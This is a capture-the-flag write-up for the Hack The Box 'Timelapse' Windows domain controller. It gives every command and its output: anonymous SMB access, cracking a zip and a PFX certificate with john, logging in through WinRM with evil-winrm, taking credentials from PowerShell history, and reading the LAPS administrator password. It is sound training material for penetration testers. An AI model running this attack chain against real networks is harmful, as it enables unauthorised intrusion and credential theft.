Box: Timelapse
Level: Easy
OS: Windows
Lets get started
Recon
Portscanning
command:sudo nmap -A 10.129.227.105 -T4 -v -p-
Nmap scan report for 10.129.227.105
Host is up (0.24s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-26 05:11:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after: 2022-10-25T14:25:29
| MD5: e233a19945040859013fb9c5e4f691c3
|_SHA-1: 5861acf776b8703fd01ee25dfc7c9952a4477652
| tls-alpn:
|_ http/1.1
|_ssl-date: 2023-09-26T05:13:28+00:00; +7h59m58s from scanner time.
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
64129/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h59m57s, deviation: 0s, median: 7h59m57s
| smb2-time:
| date: 2023-09-26T05:12:52
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 279.92 ms 10.10.14.1
2 280.01 ms 10.129.227.105
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 25 22:13:37 2023 -- 1 IP address (1 host up) scanned in 406.16 seconds
From our nmap scan we have quite a number of open ports. Our enumeration today will actually be focused on the port running the smb service, that is, port 445, also the port running the http service, that is, port 5986.
Enumeration (Port 445)
Lets start out by checking the shares available on the smb server
command:smbclient -L 10.129.227.105
Since we have no password just hit the Enter key
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ smbclient -L 10.129.227.105
Password for [WORKGROUP\bl4ck4non]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.227.105 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
We have 6 shares available on this server. The most interesting one out of these shares is the sharename Shares
Lets connect to this sharename to see what we have there
command:smbclient //10.129.227.105/Shares
Since we have no password just hit the Enter key
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ smbclient //10.129.227.105/Shares
Password for [WORKGROUP\bl4ck4non]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 16:39:15 2021
.. D 0 Mon Oct 25 16:39:15 2021
Dev D 0 Mon Oct 25 20:40:06 2021
HelpDesk D 0 Mon Oct 25 16:48:42 2021
6367231 blocks of size 4096. 1286468 blocks available
smb: \>
Cool, we can now view the files avaiable on the sharename Shares on the smb server.
Navigating to the Dev directory, there’s a zip file
Lets download this file to our machine by using the get command.
command:get winrm_backup.zip
Good. Now we can try to unzip the file
A password is required but we don’t have one.
Well, I called john already and he said he will be sending one of his brothers, zip2ohn.
Using zip2john we’ll try to generate a hash that can be cracked with john
command:zip2john winrm_backup.zip > winrm.txt
command:john winrm.txt --wordlist=/home/bl4ck4non/Documents/rockyou.txt
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ zip2john winrm_backup.zip > winrm.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ john winrm.txt --wordlist=/home/bl4ck4non/Documents/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:01 DONE (2023-09-25 22:48) 0.9259g/s 3216Kp/s 3216Kc/s 3216KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
So we got the password to be supremelegacy. Now lets unzip
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
inflating: legacyy_dev_auth.pfx
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ ls -l legacyy_dev_auth.pfx
-rwxr-xr-x 1 bl4ck4non bl4ck4non 2555 Oct 25 2021 legacyy_dev_auth.pfx
cool the password worked and we got a PKCS#12 file.
For those who don’t know about PKCS#12 file, it is a cryptographic file format that typically contains both a digital certificate and its associated private key. These files are often used for securing sensitive information and establishing secure connections, such as in SSL/TLS certificates for web servers.
To access this file we can use the openssl command
command:openssl pkcs12 -info -in legacyy_dev_auth.pfx
oops, a password is required.
I called john again but he wasn’t picking his calls (he probably thinks I’m disturbing him lool). So, I called one of his brothers pfx2john
Using pfx2john to get the hash and then using john to crack the hash
command:pfx2john legacyy_dev_auth.pfx > legacyy.txt
command:john legacyy.txt --wordlist=/home/bl4ck4non/Documents/rockyou.txt
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ pfx2john legacyy_dev_auth.pfx > legacyy.txt
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ john legacyy.txt --wordlist=/home/bl4ck4non/Documents/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:42 DONE (2023-09-25 22:58) 0.009797g/s 31662p/s 31662c/s 31662C/s thuglife06..thsco04
Use the "--show" option to display all of the cracked passwords reliably
We got the password to be thuglegacy
Now that we’ve gotten the password, we’ll use openssl to get the private keys and certificate files, this should help us connect to the box
command:openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem -nodes
command:openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.cert
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem -nodes
Enter Import Password:
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.cert
Enter Import Password:
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ ls -l private.pem
-rw------- 1 bl4ck4non bl4ck4non 1952 Sep 26 00:13 private.pem
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ ls -l certificate.cert
-rw------- 1 bl4ck4non bl4ck4non 1236 Sep 26 00:13 certificate.cert
Cool, now we can use this to connect to the box
Exploitation
If you recall, when we ran the nmap command we saw this port opened.
Port 5986 is commonly used for secure communications with Windows Remote Management (WinRM) over HTTPS. WinRM is a management protocol used for remote management and automation tasks in Windows environments.So, we’ll be using the evil-winrm tool since we have a private key and a certificate
command:evil-winrm -i 10.129.227.105 -c certificate.cert -k private.pem -S
We got a user shell as user legacyy😎. Lets go ahead and escalate our privileges
Privilege Escalation
Navigating to this directory C:\Users\legacyy\Appdata\Roaming\Microsoft\Windows\PowerShell\PSReadLine, we find the powershell history file
In that history file we find the user svc_deploy with the password E3R$Q62^12p7PLlC%KWaxuaV.
Lets switch to this user using evil-winrm
command:evil-winrm -u svc_deploy -i 10.129.107.247 -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
nice nice, now lets further escalate our privileges
Running the command net user svc_deploy, I found out that the user belong to non-standard group
LAPS stands for “Local Administrator Password Solution.” LAPS is a Microsoft-developed tool and solution designed to enhance security by automatically managing and periodically rotating the local administrator account passwords on Windows computers. The property on an Active Directory computer object that contains the LAPS-generated password for the administrator account is typically called ms-MCS-AdmPwd. This attribute is used to store the locally administered password, and it is managed by the Microsoft Local Administrator Password Solution (LAPS).
In a nutshell, this means we can try to read the administrator password
I used the Get-ADComputer command to do this
command:Get-ADComputer DC01 -property 'ms-MCS-AdmPwd'
We got the password of the Administrator user to be roF7N&7V[c%k&ipx7k.+3tt%
Lets login as the Administrator user using evil-winrm
command:evil-winrm -i 10.129.107.247 -u administrator -p 'roF7N&7V[c%k&ipx7k.+3tt%' -S
We have successfullly pwned this box😎
That will be all for today
Back To Home